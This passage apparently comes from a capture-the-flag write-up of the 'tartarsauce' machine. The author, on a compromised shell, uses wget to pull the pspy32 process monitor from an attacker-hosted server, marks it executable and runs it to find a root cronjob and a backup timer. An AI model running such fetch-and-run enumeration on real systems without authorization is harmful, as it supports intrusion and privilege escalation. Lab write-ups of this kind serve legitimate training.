PSPY
onuma@tartarsauce:/tmp$ wget http://10.10.14.10:800wget http://10.10.14.10:8000/pspy32 ; chmod 777 pspy32
wget http://10.10.14.10:8000/pspy32 ; chmod 777 pspy32
--2023-01-23 08:53:19-- http://10.10.14.10:8000/pspy32
connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 2656352 (2.5M) [application/octet-stream]
saving to: 'pspy32'
pspy32 100%[===================>] 2.53M 6.01MB/s in 0.4s
2023-01-23 08:53:19 (6.01 MB/s) - 'pspy32' saved [2656352/2656352]I found out there is a cronjob process with privileges of theroot user.
There is also a systemd timer that runs every 5 minutes, named backuperer.service
I want to know what they are doing.
onuma@tartarsauce:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
It’s executing a binary at /usr/sbin/backuperer
The binary then proceeds to an archiving operation